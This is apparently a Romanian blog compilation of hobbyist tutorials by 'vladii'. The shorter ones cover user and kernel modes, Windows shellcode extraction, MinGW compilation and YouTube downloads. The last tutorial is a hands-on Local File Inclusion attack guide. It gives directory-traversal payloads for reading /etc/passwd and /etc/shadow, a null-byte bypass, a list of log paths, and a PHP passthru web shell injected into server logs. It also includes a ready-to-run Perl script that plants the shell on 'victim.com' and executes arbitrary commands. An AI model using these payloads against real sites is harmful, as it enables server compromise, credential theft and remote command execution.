Adevaratul inteles al: “Imi instalez driverul de la..”

Ok, un nou micut “tutorial” (daca il pot denumi asa ) ). De curand, m-am confruntat cu o problema, cand incercam sa scriu un cod in ASM. Vroiam sa setez ceasul la ora 00:00:00 din Windows, folosind BIOSul. Nicio problema, aveam interruptul necesar, dar programul, cand il rulam, imi dadea eroare grava (sau eroare fatala). Avand proasta inspiratie sa nu-l intreb pe Shocker, am cautat pe Google, dar nu am gasit rezolvarea la problema mea. De unde am plecat, pana unde am ajuns este cale lunga ^_^

Shocker mi-a explicat ca eu nu pot accesa direct din windows BIOSul prin intermediul interrupturilor, deoarece eu rulez in UserMode (adica ? Cand misc mouseul pe desktop, accesez un fisier si altele, folosesc modul Userului). In UserMode nu avem acces direct la memoria kernelului, la resursele fizice ale calculatorului. Sa va arat o imagine (preluata de pe wikipedia.org) care sper sa fie edificatoare:

Clar, noi, cand rulam in User Mode suntem mai putini privilegiati, dar asta ne face si ceva mai secure. De ce ? In UserMode (Ring 3), o eroare se manifesta printr-o eroare predefinita a windowsului, pe cand in KernelMode (cel mai privilegiat, Ring 0), erorile se manifesta prin Blue Screenuri si Restarturi (ceea ce este cam neplacut ) )

Sa revenim. Deci ? Am precizat ca interrupturile nu pot fi rulate “simplu si direct” din UserMode (deoarece nu avem acces la resursele fizice ale computerului), atunci unele programe cum fac asta ? Ma refer, spre exemplu, la imaginea de pe desktop (care apare, in special, datorita placii video => direct din windows se poate avea acces la resursele fizice ale calculatorului). Cum, cum, cum, aceasta e intrebarea ? )

Aceste aplicatii comunica cu resursele fizice ale calculatorului prin intermediul unui [b]Driver[/b]. Deci, practic, ce este un driver ? Este o aplicatie, care ruleaza in Kernel Mode [ring 0 - modul cel mai privilegiat]. Ca o mica schema, “comunicarea” dintre acestea se realizeaza astfel: aplicatia [ruleaza in usermode ring 3 - windows] -> driver [ruleaza in kernelmode ring 0] -> resursele fizice ale computerului.

Cum comunica ? Aplicatia care ruleaza in usermode apeleaza anumite rutine(sau subrutine -> http://en.wikipedia.org/wiki/Subroutine) in driver, iar driverul comunica mai departe cu componenta hardware prin [b]computer bus[/b] (http://en.wikipedia.org/wiki/Computer_bus) !

Acum poate va intrebati, ok, dar eu am imagine pe desktop chiar daca nu am instalat driverul (software) de la placa video. Pai aveti, dar nu se foloseste placa video la capacitatile ei maxime, pentru ca si Windowsul are anumite drivere (pentru placa video, placa de sunet, etc.) incorporate, insa nu poate folosi toate modelele la capacitatile maxime, de aceea este nevoie de softwareul special realizat de firmwareul placii dumneavoastra !!

Cam atat am avut de spus ! Astept critici de la voi, deoarece nici eu nu sunt prea sigur de ceea ce am scris si vreau sa imi fixez cat mai bine aceste lucruri in minte, mai ales ca in viitor (cateva luni de invatat) vreau sa ma apuc de programare de drivere.

Bibliografie:

http://en.wikipedia.org/wiki/Ring_(computer_security)

http://en.wikipedia.org/wiki/Device_driver

http://en.wikipedia.org/wiki/Subroutine

http://en.wikipedia.org/wiki/Computer_bus

Al vostru, vladii !!!

Despre ShellCoding

Cum obtinem un ShellCode?

Ce este un ShellCodingul ? In principiu, cand ne gandim la ShellCoding ne gandim la orice cod care returneaza un remote shell cand este executat. Intelesul cuvantului ShellCode a evoluat, acum intelegand prin acest cuvant orice byte code care este introdus intr-un exploit pentru a indeplini o anumita sarcina. ATENTIE! Un shellcode nu trebuie sa contina Null Bytes si este ideal ca acesta sa aiba o dimensiune in bytes cat mai mica. Un alt amanunt destul de important este faptul ca in acest tutorial voi prezenta doar Window ShellCoding, nu si Linux ShellCoding. Multumiri multe ii sunt aduse lui SlicK.
Sa incepem! Toolurile de care aveti nevoie pe parcursul tutorialului:
1. NASM [Compilarea programelor ASM o vom face in NASM]
Download Link: [url] http://nasm.sourceforge.net/ [/url]
2. ALINK [Programul .exe il vom realize folosind acest tool]
Download Link: [url] http://alink.sourceforge.net/download.html [/url]
3. ARWIN [Cu acest program C, care trebuie compilat, putem gasi adresele functiilor API in respectivul dll in care ele se afla]
Download Link: [url] http://www.vividmachines.com/shellcode/arwin.c [/url]
4. W32DASM [Dezasamblator, va recomand versiunea 8.93]
5. WDHEX [Un program util care copiaza ShellCodeul dintr-o lista .alf salvata anterior cu W32DASM].
Download Link: [url] http://rapidshare.com/files/46936025/wdhex.exe.html [/url]

Avand aceste tooluri si niste cunostine decente de ASM, sa vedem cum se poate extrage ShellCodeul, iar, mai apoi, sa optimizam codul ASM pentru ca ShellCodeul sa fie de dimensiune cat mai mica si sa nu contina Null Bytes (\x00).

Sa consideram un mic cod ASM, care nu face nimic altceva decat sa produca un Beep ! ATENTIE! Un amanunt destul de important pe care eu nu il voi atinge in acest tutorial [poate intr-o versiune ulterioara] este faptul ca orice program vine incarcat in decat cu kernel32.dll, deci utilizarea altor functii api din alte dlluri (user32.dll, etc.) necesita incarcarea librariei respective (2 functii API sunt foarte importante aici: LoadLibraryA si GetProcAddress). Un alt amanunt important, cand vom extrage shellcodeul, il vom extrage doar din zona ..start a programului realizat in ASM, de aceea declararea variabilelor este INTERZISA, iar importarea functiilor API deasupra acestei sectiuni este iarasi incorecta. Un astfel de exemplu de cod incorrect este urmatorul:

Cod:

%include “win32n.inc”extern SetCursorPos import SetCursorPos user32.dll title db “hello”,0 message db “hello world”,0

Ideea este alta, va prezint un mic cod, cum ar fi corect, apoi lasam balta aceasta idee si trecem la dezvoltarea bazelor ShellCodingului.

Cod:

segment .code USE32 ..start xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx jmp short functie ; sari la labelul @functie functie2: pop eax ;scoate din stack ultima valoare si baga in eax mov byte [eax+10], dl ;scriem 10 caractere: user32.dll, ignoram N mov ebx, 0×77e7d961 ;adresa functiei LoadLibraryA push eax ;echivalent cu push user32.dll call ebx ;callam LoadLibraryA mov ecx, eax xor eax, eax jmp short functie3 functie4: pop eax mov byte [eax+12], dl mov ebx, 0×77e7b332 ;adresa functiei GetProcAddress push eax push ecx call ebx restul: push byte 1 push byte 1 call eax ;SetCursorPos mov ebx, 0×77e798fd ;adresa functiei ExitProcess push byte 1 call ebx functie: call functie2 db ‘user32.dllN’ jmp short functie2 ; sari (intoarce-te la labelul @functie2) functie3: call functie4 db ‘SetCursorPosN’

Daca am fi realizat un cod in FASM care sa faca acest lucru era mult mai simplu, deoarece am fi putut utiliza direct variabilele, iar in NASM nu putem scrie ceva genul: push ceva Call [functieapi], decat daca ceva este numar. De aceea, inainte de a executa labelul specific unei functii API am sarit la un alt label care calleaza labelul initial, dar in care se afla un element foarte important: db ‘SetCursorPosN’, unde SetCursorPos este numele “variabilei” care trebuie utilizata, iar N vine de la Null Byte. Traind cu speranta ca ati inteles ceva din codul de mai sus, trec la lucruri mai simple. Sa consideram micul nostru cod care face Beep.

Cod:

;beep.asm segment .code USE32 ..start: xor eax, eax xor ebx, ebx xor ecx, ecx mov ebx, 0×77eac910 ;adresa functiei Beep din kernel32.dll mov ax, 750 ;frecventa sunetului in Hertzi mov cx, 3000 ;durata Beepului push eax push ecx call ebx ;Callam functia Beep mov ebx, 0×77e798fd ;adresa functiei ExitProcess din kernel32.dll mov ax, 1 push eax call ebx

Mai multe despre functia api Beep gasiti aici: [url] http://msdn2.microsoft.com/en-us/library/ms679277.aspx [/url].
Un alt lucru care trebuie sa vi-l spun este faptul ca in Windows, un cod NASM incepe cu segment .code USE32 ..start:, pe cand pe Linux incepe: [SECTION .text] global _start _start:
ATENTIE! Adresele functiilor api in dllurile lor pot diferi de la un utilizator de Windows la altul, datorita versiunii de Windows, versiunii Service Packului si datorita diferitelor updateuri care se aduc zi de zi. De aceea vom utiliza ARWIN pentru aflarea adreselor functiilor in dllurile din windowsul nostru.
Intram in fisierul in care am salvat arwin.exe folosind CMD ! Dupa ce am ajuns, tastam urmatoarea comanda: arwin.exe NumeleDllului NumeleFunctiei. Spre exemplu, putem introduce: arwin.exe kernel32.dll Beep. Poate imaginea urmatoare va fi de folos:

Dupa ce inlocuim in codul de mai sus adresele dumneavoastra ale functiilor API, poate incepe distractia! Copiati codul [cu tot cu modificarea dumneavoastra] in notepad si apoi salvati cu extensia .asm (File -> Save As -> Filename: beep.asm). Deci fisierul nostru se va numi beep si va avea extensia .asm. Ideal ar fi sa salvati toate toolurile care le-am prezentat mai sus [compilate-cele care au nevoie de asa ceva] impreuna cu beep.asm intr-un folder. Acum deschideti iar CMD pentru a compila codul ASM si pentru a-l face .exe ! Intrati din cmd in folderul in care ati salvat toate cele de mai sus. Apoi tastati urmatoarea comanda: nasmw.exe -fobj beep.asm. Asa verificam daca programul are erori, daca nu are, putem trece mai departe la crearea executabilului. Introduceti in CMD: alink -c -oPE -subsys gui beep, iar daca operatiunea a decurs fara nicio problema, atunci puteti rula executabilul tastand in CMD: beep ! Sper ca imaginea urmatoare sa fie edificatoare:

Acum ca am reusit crea executabilul, sa extragem ShellCodeul. Pentru aceasta, deschideti .exele cu w32dasm.

In imaginea de mai sus, observam ca sunt prezente 3 coloane: adresele, shellcodeul si codul ASM (de la stanga la dreapta). Putem sa extragem acest shellcode manual, adica, spre exemplu, din 31C031DB obtinem: “\x31\xC0\x31\xDB”, sau folosind wdhex, care extrage ShellCodeul automat pentru noi. Pentru a face acest lucru, trebuie mai intai sa salvam ceea ce am vazut in W32DASM. Cum facem asta ? Simplu: File -> Save Disassembly Text File and Create Project File -> FileName: beep.ALF -> Ok. Atentie, fisierul trebuie sa aiba extensia .ALF, nu .ELF (care este specific Linuxului). Intrati in CMD in foldeul in care ati salvat beep.alf si in care [sper] aveti si wdhex.exe, si tastati urmatoarea comanda: wdhex beep.alf ! Programul va va arata shellcodeul deja extras.

In concluzie, shellcodeul nostrum este urmatorul:

Cod:

char shellcode[]= “\x31\xC0\x31\xDB\x31\xC9\xBB\x10\xC9\xEA\x77\x66\xB8\xEE\x02″ “\x66\xB9\xB8\x0B\x50\x51\xFF\xD3\xBB\xFD\x98\xE7\x77\x66\xB8″ “\x00\x00\x50\xFF\xD3″;

Cum putem verifica daca ShellCodeul functioneaza ? Foarte simplu! Sa consideram urmatorul “schelet” al unui program in C:

Cod:

/*shellcodetest.c*/ char code[] = “bytecode will go here!”; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }

Dumneavoastra trebuie sa inlocuiti “bytecode will go here!” cu shellcodeul dumneavoastra, sa compilati programul, sa-l faceti .exe, iar apoi sa vedeti daca functioneaza.

Optimizarea ShellCodeului
Cum am precizat la inceput, este ideal ca ShellCodeul sa nu contina Null Bytes, dar, din pacate, codul nostru contine deja 2 nullbytes (“\x00\x00”). Ideea este sa verificam de unde acestia provin si sa incercam, daca se poate, sa ii eliminam. Daca ne uitam in imaginea din W32DASM, NullBytes provin de pe linia mov ax, 1. Se stie ca registrul eax are 3 parti -> ax, ah, al. al reprezinta partea inferioara a registrului. Sa incercam sa schimbam linia mov ax, 1 cu mov al, 1. Pe langa faptul ca vom scapa de NullBytes, programul va avea 32 de bytes !!!

Cam atat am avut de prezentat, o sa rectific eventualele greseli in caz ca acestea exista (si daca exista, imi cer din tot sufletul iertare pentru ele, mai ales ca am incercat sa creez ceva util si folositor). Asa ca tineti aproape!

Linkuri Utile:
- [url] http://www.vividmachines.com/shellcode/shellcode.html [/url]
- [url] http://en.wikipedia.org/wiki/Shellcode [/url]
- [url] http://www.bradleybeast.com/content/view/84/ [/url]

Enjoy it!

@vladii 2007

Compilare programe C folosind MinGW

Nemessis mi-a zis sa fac acest scurt tutorial. De fapt este mai mult un text informativ, deoarece nu va recomand sa folositi MinGW, deoarece exista infinite posibilitati mai bune. Un exemplu este Dev-C++ care la randul lui, foloseste tot MinGW32

Mai intai sa downloadam programul:

Cod:

http://www.mingw.org/download.shtml

Si mirror la versiune 5.0 downloadata de mine:

Cod:

http://rapidshare.com/files/44150104/MinGW-5.0.0.exe.html

Dupa ce instalati, va recomand sa faceti instalarea la Minimal, nu are rost sa setati mai mult + ca o sa asteptati apoi o gramada sa downloadeze toate cate are nevoie pentru a continua instalarea.
Acum dati Click Dreapta pe My Computer -> Properties -> Advanced -> Environment Variables. Ne uitam la System Variables la subdiviziunea: Path, daca este adaugat pathul catre MinGW/bin pe calculatorul dumneavoastra. Daca este dati Cancel, daca nu este setati dumneavoastra si dati Ok !
Sa trecem mai departe. Deschidem un fisier notepad, in care vom insera codul nostru C. Eu am considerat urmatorul simplu exemplu:

Cod:

#include <stdio.h> int main() { printf (“Eu sunt vladiii”);return 0; }

Salvam fisierul cu extensia C ! Deci programul va fi de genul: numedorit.c. Acum intram in CMD (Start -> Run -> CMD). Ne ducem la adresa (pathul) unde a fost salvat numedorit.c, in cazul meu pe Desktop. Ca sa avansati in foldere trebuie sa scrieti: cd numefolder, iar ca sa reveniti in folderul de mai jos: cd.. (ma rog, exprimarea este defectuoasa).
In CMD vom scrie: gcc numedorit.c -o numedorit2 -Wall -lm. Astfel vom compila numedorit.c si ne vor aparea eventualele erori. In caz ca nu exista nicio eroare, exeul se va salva cu numele numedorit2 in pathul in care se afla numedorit.c !

Sper ca am fost destul de explicit. Pentru mai multa documentatie, cititi aici:

Cod:

http://www.mingw.org/docs.shtml

LE: Este aproape la fel ca pe Linux

Bafta! Vladii

Cum sa: downloadezi filmulete de pe YouTube [manual]

Cum sa: downloadezi filmulete de pe YouTube ?

Este indicat sa folositi un proxy ^_^

In primul rand sa alegem un filmulet de pe youtube, care sa presupunem ca are urmatorul link:

Cod:

http://www.youtube.com/watch?v=irp8CNj9qBI

Acum retinem ce scrie dupa v=, in cazul nostru irp8CNj9qBI si compunem urmatorul link:

Cod:

http://www.youtube.com/v/irp8CNj9qBI

Dupa cum vedeti, la url am adaugat /v/ si ceea ce am retinut mai devreme. Acum ne apare o fereastra mare in care putem viziona clipul la dimensiuni evident mai mari. Dupa ce ati intrat pe linkul de mai sus, URLul va arata in felul urmator:

Cod:

http://www.youtube.com/jp.swf?video_id=irp8CNj9qBI&eurl=&iurl=http%3A//img.youtube.com/vi/irp8CNj9qBI/2.jpg&t=OEgsToPDskK4RS8Ohzmx9GXDFiv_9Rpy

Retinem tot ce scrie dupa jp.swf?, in cazul nostru video_id=irp8CNj9qBI&eurl=&iurl=http%3A//img.youtube.com/vi/irp8CNj9qBI/2.jpg&t=OEgsToPDskK4RS8Ohzmx9GXDFiv_9Rpy , si compunem again un nou link:

Cod:

http://www.youtube.com/get_video.php?video_id=irp8CNj9qBI&eurl=&iurl=http%3A//img.youtube.com/vi/irp8CNj9qBI/2.jpg&t=OEgsToPDskK4RS8Ohzmx9GXDFiv_9Rpy

Dupa cum vedeti, am format URL din urmatoarele 2 parti: http://www.youtube.com/get_video.php? si ceea ce am retinut mai devreme [puteti folosi copy--->paste ].
Dupa ce ati efectuat aceasta si ati dat Enter in browser o sa va apara casuta de download a filmuletului, in format .FLV !!!

Un player de filmulete pentru formatul .flv gasiti aici:

Cod:

http://www.softpedia.com/progDownload/FLV-Player-Download-27852.html

Enjoy It !!!

Credite: Eu

Vladii

LFI [Local File Inclusion]

Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.

Mai intai, sa vedem acest mic cod php:

Cod:

<?php $page = $_GET[page]; include($page); ?>

Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.

Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:

Cod:

site.host/index.php?page=../../../../../../../etc/passwd

Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola.
O parola criptata, ar trebui sa arate cam asa:

Cod:

username:x:503:100:FullName:/home/username:/bin/sh

In acest exemplu, parola este x, alt exemplu de parola fiind:

Cod:

username:!:503:100:FullName:/home/username:/bin/sh

Alte “locuri” unde puteti gasi parolele in afara de /etc/passwd ar cam fi:

Cod:

/etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits

In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00.
Exemplu de cod:

Cod:

site.host/index.php?file=../../../../../../../../etc/passwd%00

Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.
Cateva adrese de loguri:

Cod:

../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log

Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser:

Cod:

site.host/<? passthru(\$_GET[cmd]) ?>

O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL’ul si pagina pe care noi am accesat-o, browserul o traduce in:

Cod:

site.host/%3C?%20passthru(\$_GET[cmd])%20?>

Deci va trebui sa facem altceva… Putem utiliza urmatorul script perl:

Cod:

#!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site=”victim.com”; $path=”/folder/”; $code=”<? passthru(\$_GET[cmd]) ?>”; $log = “../../../../../../../etc/httpd/logs/error_log”;print “Trying to inject the code”; $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80″) or die “\nConnection Failed.\n\n”; print $socket “GET “.$path.$code.” HTTP/1.1\r\n”; print $socket “User-Agent: “.$code.”\r\n”; print $socket “Host: “.$site.”\r\n”; print $socket “Connection: close\r\n\r\n”; close($socket); print “\nCode $code sucssefully injected in $log \n”; print “\nType command to run or exit to end: “; $cmd = <STDIN>; while($cmd !~ “exit”) { $socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80″) or die “\nConnection Failed.\n\n”; print $socket “GET “.$path.”index.php=”.$log.”&cmd=$cmd HTTP/1.1\r\n”; print $socket “Host: “.$site.”\r\n”; print $socket “Accept: */*\r\n”; print $socket “Connection: close\r\n\n”; while ($show = <$socket>) { print $show; } print “Type command to run or exit to end: “; $cmd = <STDIN>; }

Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri:
1) modifica numele siteului
2) modifica numele logului si calea catre el
3) schimba index.php= cu ce doresti tu

Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!!

Linkuri utile:

Cod:

http://www.milw0rm.com/video/watch.php?id=57

Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun.

Proof of Concept:
[img]
http://img355.imageshack.us/my.php?image=sitewe2.jpg
[/img]

Traducerea si adaptarea+modificari: vladiii